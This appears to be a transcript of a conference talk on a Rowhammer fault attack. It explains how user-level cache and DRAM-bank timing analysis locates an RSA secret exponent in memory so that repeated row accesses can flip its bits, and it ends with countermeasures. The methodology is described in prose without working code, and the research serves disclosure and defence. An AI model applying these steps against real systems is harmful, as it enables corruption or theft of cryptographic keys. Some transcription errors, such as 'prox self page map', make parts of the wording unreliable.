 Good afternoon, everybody. So I'm Sarni Bhattacharya. I'm going to present curious case of Rohammer, flipping secret exponent bits using timing analysis. So first I'll give a brief overview of what Rohammer actually is. So it may be a new term for few of you. So what Rohammer actually is, it is when you make repeated accesses to different rows in a particular DRAM bank, then what happens is those repeated accesses causes the recharging and discharging of the cells continuously. And this results in the adjacent cells to electrically interact between themselves and they may lose charge. So what will happen is for this repeated discharging and recharging, some of the adjacent cells may lose charge and this may cause flipping of bits. So this is actually a fault which can be created using software means and it can have a great impact. Like I'll show that what we are trying to do with that. So the objective is to we have developed a methodology which combines the timing analysis which performs Rohammer in a controlled manner and creates bit flip in cryptographic secret which are stored actually in the main memory. So I'll briefly highlight our contributions. Like we combine the knowledge of the reverse engineering of LLC slices, like last level cash slice, and DRAM, dynamic RAM addressing with timing side channels to determine the DRAM bank in which the secret is actually residing. Then we precisely trigger Rohammer to address this that have the same and that result in the same addresses to the same bank as a secret. And this inevitably increases the probability of bit flip in the secret exponent. And we provide a series of steps for this methodology. So this is precisely the outline of my talk. Like first I'll give a brief introduction of DRAM architecture and the vulnerability of Rohammer. Then I'll go straight to the methodology that we have used and the experimental results. So first I'll start with the Rohammer DRAM vulnerability. So for that brief overview about the DRAM structure, so the DRAM is hierarchically composed of channels, ramps, and inside there are banks. So what exactly they are? So you see the RAM slots inside the PCB. So those are the card that is given to us. Can be a single channel or a double channel. Can work in like it depends on the vendor that you are buying. It can be a single channel DRAM or a double channel DRAM. So depending on that, a particular channel now again divides into ranks and further into banks. So why are this required? Like whenever a RAM access is made, it can be made parallelly if they are addressed in different banks. But when they're addressed in the same bank, then it is addressed sequentially because there is a row buffer included over there. Like it's a door. Like you have to go through that. So whenever a read request is sent, what happens is that that particular row is activated. The charge of that particular row goes over to the row buffer. And from that row buffer, the read and write whatever is made. So if there is continuous accesses to the same row, like to the two different rows in the same bank, it results in a row buffer latency. So this is what that is written in the slide. So next we'll go to the row hammer. So what happens is, like there is a small code segment over here, like this was given in the original paper, which was published in ISCA 14. So it says that read address X, read address Y, and then cash flush address X and Y so that it is removed from the cache. And we ensure that both the accesses are now made from the DRAM and again do the same thing. So now if X and Y goes to different rows of the same bank in the DRAM, then what happens is that adjacent cells of those rows may or may not lose charge. Like there is a high probability that they'll lose charge and the adjacent rows will have a flipping bits. So this is a very naive example of how row hammer can be inflicted. So then we go to the cache memory architecture because we'll need this. In our methodology. So more or less we know that we have multi-core architecture. So in our recent Intel architecture, so the first figure is for the cache architecture for Intel IV bridge, where we have four cores and L1 and L2 are for each cores while L3 is being shared for all the cores. But there is a cache, like L3 is divided into slices. So which can be parallely accessed by all the four cores and it has been introduced to improve the parallel access patterns like that. So this slice addressing is done using a complex addressing function which is referred here as hash. So this hash function is actually not disclosed by the Intel manufacturers. But some of the recent right papers in 2015 have reverse engineered this LLC slice function and they have come up with very interesting functions which actually points that given a physical address that if we are able to find out the physical address then we can actually find out the cache slices in which they will map. So the functions differ across various architectures. So this is an example of Intel IV bridge that I've given. So now the attack model. What the adversary aims? The adversary aims to induce a bit flip in the secret exponent of the public exponentiation algorithm. I'm sorry for that. The challenges which are involved in this is the secret resides in some arbitrary location in the memory and also some arbitrary location in the main memory. So the adversary is not oblivious of that. Secondly, the attacker is having user-level privileges. So he does not have the knowledge of the locations of the LLC set and slices and the DRAM channel rank bank sections in which the secret maps to. So in order to perform the row hammer on that precise locations, what he needs to learn is the bank in which the secret resides. So if now imagine a situation that this adversary is given a decryption oracle, like it has given an access to the decryption oracle and it sends ciphertext to the decryption oracle and observes the decrypted value, like the plain text value. So what this will result is, like since he is frequently accessing that, like frequency requesting that, the secret exponent will sit in the cache memory itself and the results will not go to the main memory at all. So it will result in a cache hit, like the accesses to the secret exponent. So this motivates the adversary to incorporate a spy process. So what the spy process will do? The spy process will evacuate the secret exponent from the cache and then it will run a concurrent execution to make a timing analysis and find out that on which channel rank and bank the secret exponent is sitting. So the methodology is like this, like first we determine the eviction set. So what the eviction set says that we have to find out that where the secret exponent sits in the cache. So for the first thing, the spy initially allocates a huge set of memory elements and the finds out their corresponding physical addresses by looking at prox self page map. So this is pretty available in user space for Lerang's kernels before version 4.0. So now this thing will happen. So first the adversary initiates a spy, then the spy creates a memory map. It computes all the functions that are available. Then for all sets it selects m elements which belong to that particular cache line and for all the case slices. So this he can do given the functions. Now it will prime the LLC set and the slices with those selected elements. So that becomes my eviction set. So this process will ensure that the spy has removed the secret exponent from the cache, from that particular set and slice. So now the adversary sends the input to the decryption engine and the decryption engine runs with the secret exponent. Again the adversary in step seven receives a decryption message and allows the spy to now run the probe base where it will time the accesses to the cache set of the slice like with the eviction set elements. So what we'll observe from this is so when the spy is at work what they'll do if the system is having K process of course. So each slice having C sets and M base. So it'll choose like this matches more or less known to us. So after that he'll choose m cross K selected elements for all the slices for that particular set. Then what he'll do is it'll do a simple prime and probe. So and it'll do for all the T sets. After that it has to determine that on which slice this secret exponent actually belongs to. So what it'll do is it'll again do a prime and probe but now K times with each time with M elements for each of the slices. And it'll do again a prime and probe with that. So what will expect that for a particular slice the timing analysis will give a higher value than the other slices. Then it'll determine the dram bank where the secret maps. So how it'll do that? So I have already said about the row buffer conflict. So what will happen when two accesses are conflicting to the same dram bank then they will be like sequentially handled. So it'll result in some latency. So that is termed as a row buffer latency. So if it is in different bank then it'll address parallel so there is no latency in that. So what we expect is that when we do concurrent executions to the same bank we'll expect that the higher timing values will be observed. So again we have a similar experimental scenario but here the spy does something more. What does it do? It determines the set slice addresses. Determines the channel rank bank addressing. Now this also is like kind of not known. Like it is not revealed by the processor manufacturers but it has been reverse engineered recently. So in 2015, so using those functions it can compute that from the physical addresses. Then it picks up a set C which actually acts as an eviction set and runs that. So it actually says that your secret element is now removed from the cache. Now it primes, now it allows the adversary to send the ciphertext to the decryption engine. When the decryption engine runs the secret exponent parallelly what it does in step nine is access randomly elements to a particular bank B and again times the analysis. So what it'll result is for all banks after completing this entire set for all the banks it'll find out that for a particular bank it has a higher timing and while the other banks will have less timing. So we'll start with the experimental validations and look at how the results have been. So first the experimental brief introduction about the setup, like we have implemented this on 1024 bit RSA which has been implemented in new GMP version number this one if anyone wants to know. Like the experiments are performed on Intel Core i5 processor and having IV bridge micro architecture and running Ubuntu 12.04 with kernel version 3.2. The Linux kernel version being older than 4.0 we did not require any administrative privilege to run the entire attack. So first determining the set and slices as I have said like this mathematics had been done like from determining the physical address using prox self page map. And after this these functions are already are there in literature where researchers have reverse engineer this LLC slice functions. Using this function we have selected 48 data elements because our system has 12 way associativity and four cores. So for that we have selected 48 data elements for distinct cache slices and for four for distinct cache lines and for four slices. So what we observe is that for identifying the cache set this is like for the red line shows that there is no collision and the blue line shows that there is collision. So there are two sets for which we draw this figure. One is having a collision and one is having a no collision. So it's not pretty apparent from this but if we take the average value out of this then we see that approximately the difference is 80 clock cycle. And this is because the set, the eviction set we have used is a near optimal eviction set. So we have de-done this experiment using a better eviction set claimed in Rohamad.js paper. So we'll show the results later. So then identifying the LLC slice using the reverse engineered equations as I have shown previously. The graphs show that sorry, the slice is zero is shown in red and while the slice two in the first figure is shown in blue. So the timing observations are during the probe phase when the secret maps to the slice zero. So we expect that slice zero should have more timing should show more timing values than that of the slice two. So that is apparent from the figure. While on the other hand when the secret maps to slice two it is having higher values than slice zero. So this is pretty much apparent from the figure. Now we move to the alternative strategies that we have for the reverse engineering as well as the alternative strategies for this class set selection. So initially figure A shows the alternative eviction set that has been described in as I've said Rohamad.js paper which has been accepted this year in NIMBA. And the second graph the B shows the cache slice functions described in another paper which slicedly differs from the equations that we have shown previously. So the results from the previous one and this one remains pretty much similar. So next we go to the dram bank addressing. So what we found over here is timing observations for dram bank collision in the first graph is somewhat having more values than that of the second graph. So it has values from the range 550 to 750 while it is missing in the second graph. So we have done this for all the banks and we have found the correct bank by this approach. So but this is not as good result as we have expected from the LLC like the LLC values. One reason may be like there is no like we didn't impose any concurrency between the adversary and the spy and the secret process that it's running. So since there is no concurrency there may be a few cases where the row buffer collision actually happened while the other cases have actually occurred parallel. So the results may be like this but still we were able to identify that. So next what we did is we introduced row hammer by automatically like by repeatedly accessing the elements in that particular bank. And we found out that the number of bit flips observed in the bank indices as you can see it varies from zero to 16 like 15. There are 16 banks in that particular DIMM. So the number of bit flips are pretty huge and this results we have collected say over seven days the entire execution ran and after seven days we got this much bit flips. So this is really scary. So next I'll talk about the counter measures. So there are various counter measures which are proposed like once it has been once row hammer was found out. So I'm listing out the most promising three like the probabilistic adjacent row activation which was proposed by the original paper Kim in ISCA 14 and it says that with probability half I'll refresh the adjacent rows. So it's like very low cost overhead. The targeted row refresh TRR it says that when a particular row has been accessed over a limit then I'll definitely refresh the adjacent rows. Then there is a software counter measure named Anvil which says that, which actually uses hardware performance counters and finds out that if the cache misses crosses a particular threshold then that software counter measure will look for the number of RAM accesses for a particular bank. And it will find out that if a particular bank means rows in a particular bank are getting accessed greater than a threshold then it'll stop the execution and do the necessary things that it'll do. So there are obviously certain limitations and the offer attack. So first thing that we have assumed that the secret decryption exponent resides in a particular location in the drum and it has not been page swapped throughout the process. So this is one of our assumptions. The second assumption is that we have run this system, this attack on a older version of the lead-on. So it's like 3.2 and so it doesn't require any user privilege but if for means after 4.0 it will require administrative privileges. So the third point is that this is equally relevant in cross VM architecture where the hardware is actually shared and the VMs are actually having administrative privileges. So this is still relevant in that case and the fourth point is that this is relevant in customized embedded applications as well as other OSes which did not realize this fault and did this, still have this privilege. So the summary of our work that we illustrate a combination of the timing and fault analysis exploiting row hammer, the experiments involve timing analysis and it shows variation that leads to the identification of LLC sets and slices. The row buffer collision has been exploited to identify the drum banks which actually holds the secret and the proposed attack finds most relevance in cross VM setup where the co-located VMs share the underlying hardware. So thank you and- Thank you very much. These are the-